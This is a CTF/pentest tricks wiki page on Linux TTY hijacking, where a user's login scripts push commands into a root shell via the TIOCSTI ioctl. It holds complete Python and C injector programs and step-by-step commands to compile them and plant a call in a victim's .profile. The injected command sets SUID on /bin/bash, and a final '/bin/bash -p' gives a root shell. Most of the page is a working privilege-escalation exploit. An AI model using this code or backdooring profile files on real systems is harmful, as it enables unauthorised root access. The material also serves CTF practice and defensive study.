> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/capabilities/privilege-escalation-linux-tty-hijacking.md).

# Tty Hijacking

## TTY Pushback via Sudo su

Abusing `sudo su - user` when it doesn't allocate a new TTY, keeping the session attached to the original TTY, allows for TTY pushback via the target user's profile scripts.

This technique relies on the fact that when `su - user` or `sudo -u user` is executed from a root shell without allocating a new pseudo-terminal (PTY), the target user's shell remains attached to the original root shell's TTY. The `TIOCSTI` ioctl allows injecting characters into the input buffer of a TTY. By controlling the target user's shell initialization files, such as `.bashrc` or `.profile`, an attacker can cause commands to be injected into the root shell's input stream. These injected characters are processed by the root shell when the target user's shell exits.

Create a Python script that leverages `ioctl(0, termios.TIOCSTI, char)` to push characters into the TTY's input buffer:

```python
#!/usr/bin/env python3
import fcntl, termios, os, sys, signal
os.kill(os.getppid(), signal.SIGSTOP) # Optional: Stop the parent process briefly
for char in sys.argv[1] + '\n':
  fcntl.ioctl(0, termios.TIOCSTI, char)
```

Alternatively, a C program can be used for the same purpose, utilizing the `TIOCSTI` ioctl directly:

```c
#include <sys/ioctl.h>
#include <termios.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char **argv) {
    if (argc != 2) return 1;
    char *cmd = argv[1];
    for (int i = 0; i < strlen(cmd); i++) {
        ioctl(0, TIOCSTI, &cmd[i]);
    }
    ioctl(0, TIOCSTI, "\n");
    return 0;
}
```

Save this script (e.g., `/tmp/rooting.py`) and make it executable:

```bash
chmod +x /tmp/rooting.py
```

If using the C version, save it (e.g., `/tmp/rooting.c`), compile, and make executable:

```bash
gcc /tmp/rooting.c -o /tmp/rooting
chmod +x /tmp/rooting
```

Modify the target user's profile file (e.g., `/home/orville/.profile`, `/home/orville/.bashrc`) to execute the script when the user logs in. The script should be passed the command you want to push into the root shell. This command will write the desired input to the TTY buffer using `TIOCSTI`. For example, to make `/bin/bash` SUID:

```bash
echo 'python3 /tmp/rooting.py "chmod +s /bin/bash"' >> /home/orville/.profile
```

Or, if using the C version:

```bash
echo '/tmp/rooting "chmod +s /bin/bash"' >> /home/orville/.profile
```

Wait for the root user to execute `sudo su - orville`. When root logs in as the target user, the `.profile` script will execute. This script will inject the specified command (e.g., `chmod +s /bin/bash`) into the root shell's TTY buffer using `TIOCSTI`. The root shell, which was paused, will resume after the target user's shell exits and process the injected command as if it were typed by the root user.

Once the command has been executed (e.g., `/bin/bash` is SUID), you can execute the shell with root privileges:

```bash
/bin/bash -p
```
